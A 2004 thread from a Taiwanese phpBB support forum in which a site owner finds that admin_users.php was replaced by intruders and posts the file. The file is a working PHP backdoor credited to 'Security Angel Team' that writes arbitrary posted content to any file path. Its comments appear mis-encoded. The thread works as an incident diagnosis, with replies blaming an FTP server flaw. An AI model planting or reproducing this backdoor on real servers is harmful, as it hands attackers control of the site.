竹貓星球

虛擬網路的真實天堂
https://phpbb-tw.com/phpbb/

[問題]請問這是被駭了嗎?

https://phpbb-tw.com/phpbb/viewtopic.php?f=2&t=30651

1 頁 (共 1 頁)

[問題]請問這是被駭了嗎?

發表於 : 2004-12-13 11:57
jhung
●架設主機作業系統:Windows Xp Pro SP2 有開防火牆
●快速架站程式:Appserv
●您的上網方式:ADSL
●您的 phpBB2 版本:phpBB 2.0.6
●您的 domain(網域名稱) :www.gamejo.com
●您的 phpBB2 連結網址: http://www.gamejo.com
●錯誤狀態:

原本後台這個區域沒有東西的,這兩天沒進後台,今天一進去後台管理就出現這個欄位,]保存文件名...這個區域...還是簡體的...
我已經很久很久沒有再加裝外掛了~
請問這是被駭了嗎?

圖檔

發表於 : 2004-12-13 12:05
Martinet
應該是=口=...如果沒有其他人有修改權限的話..就是...|||

發表於 : 2004-12-13 12:16
jhung
Martinet 寫:應該是=口=...如果沒有其他人有修改權限的話..就是...|||
是的~沒有其他人有修改權限...

糟糕...我對程式碼不熟...不知道去哪改囉...

先從admin.php和.TPL找起了...

唉...駭我的小香蕉做什麼...

發表於 : 2004-12-13 13:35
jhung
找到一個他們改過的檔案admin_users.php
整個檔案被改成以下內容~

不過不知道什麼作用\r
有人可以幫忙看一下嗎?

代碼: 選擇全部

<?php
// Codz by angel on 2004, May 26
// Powered by Security Angel Team


// 壺蛌砱趼睫\r
function stripslashes_array(&$array) {
        while(list($key,$var) = each($array)) {
                if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
                        if (is_string($var)) {
                                $array[$key] = stripslashes($var);
                        }
                        if (is_array($var))  {
                                $array[$key] = stripslashes_array($var);
                        }
                }
        }
        return $array;
}

// 瓚剿 magic_quotes_gpc 袨怓
if (get_magic_quotes_gpc()) {
    $_POST = stripslashes_array($_POST);
}

// 硒俴紱釬\r
if($_POST['action']=="create")
{
        $fp=@fopen("".$_POST['filename']."","wb");
        $content = $_POST['filedate'];
        $fw=@fwrite($fp,$content);
        if ($fw) {
                echo "<b>鳩炰ㄛ迡恅璃傖髡ㄐ</b><a href=".$PHP_SELF.">殿隙</a>";
                exit;
        } else {
                echo "<b>迡恅璃囮啖ㄛ岆祥岆癹腔恀枙ˋ</b><a href=".$PHP_SELF.">殿隙</a>";
        }
        @fclose($fp);
}
?>

<form action="<?=$PHP_SELF?>" method="post">
悵湔腔恅璃靡(:<font color="#FF0000">angel.php</font>):<br>
<input type="text" name="filename" size="60">
<p>
恅璃悵湔婓:<br>
<?=str_replace('\\\','/',dirname(__FILE__))?>
<p>
恅璃囀:<br>
<textarea name="filedate" cols="60" rows="10"></textarea><br>
<input type="hidden" name="action" value="create"><input type="submit" value="悵湔">
</form>
<b>蛁砩ㄩ絞衄眈肮腔恅璃湔婓奀ㄛ蔚俇蜊迡囀ㄐ</b>

發表於 : 2004-12-13 13:41
webspirit
安全天使小組?  :-o
http://www.4ngel.net/

發表於 : 2004-12-13 18:14
jhung
經朋友幫忙看~確定是被駭了~~
我用XP SP2 有開防火牆
我的PHPBB系統是 2.0.6
朋友説:
那支新的程式是一個檔案上傳的程式, 基本上駭客如果能放檔案到你的電腦上 他不需要放一支檔案上傳程式吧 感覺多此一舉。
PHPBB不太可能有這麼大的BUG,有可能是FTP有漏洞。

我決定升級PHPBB版本,換掉原本用的FTP伺服器軟體

給大家做參考

發表於 : 2004-12-13 18:31
jackyilk
您能提供一下您所使用的FTP伺服器軟體嗎?
這樣讓有使用的人也可以警覺一下~

發表於 : 2004-12-13 20:07
webspirit
這麼說不是 phpBB 的問題而是 FTP Server software 的問題囉

發表於 : 2004-12-14 14:10
蠻好笑的...他還幫你寫個免費的上傳程式....哈哈哈(閃人~)

發表於 : 2004-12-14 20:08
jhung
jackyilk 寫:您能提供一下您所使用的FTP伺服器軟體嗎?
這樣讓有使用的人也可以警覺一下~
我原本是用這套
TYPSoft FTP Server
蠻陽春的~

線在在考慮整個討論區再升級了...可是...又回到資料庫不相容的問題了...

好煩阿~~~ :-?

發表於 : 2004-12-14 20:12
design
jhung 寫:
唉...駭我的小香蕉做什麼...
對不起.. 我正在吃飯.. 笑到噴飯 :lol: :lol:

這句太爆笑了 抱歉 :oops: :oops:

應該替你感到婉息才對.. :mrgreen:

發表於 : 2004-12-15 22:23
joly
大陸高手很多,這不算慘,都進到後台了,沒真的駭掉你的小香蕉,他目的只是在示威,呵呵! :-D

發表於 : 2004-12-15 23:45
[ffs]hunej
是有駭客作這檔事是為了提醒user注重安全性啦...
不過也不必這樣做吧......
所有顯示的時間為 UTC+08:00
1 頁 (共 1 頁)

Powered by phpBB® Forum Software © phpBB Limited

正體中文語系由 竹貓星球 維護製作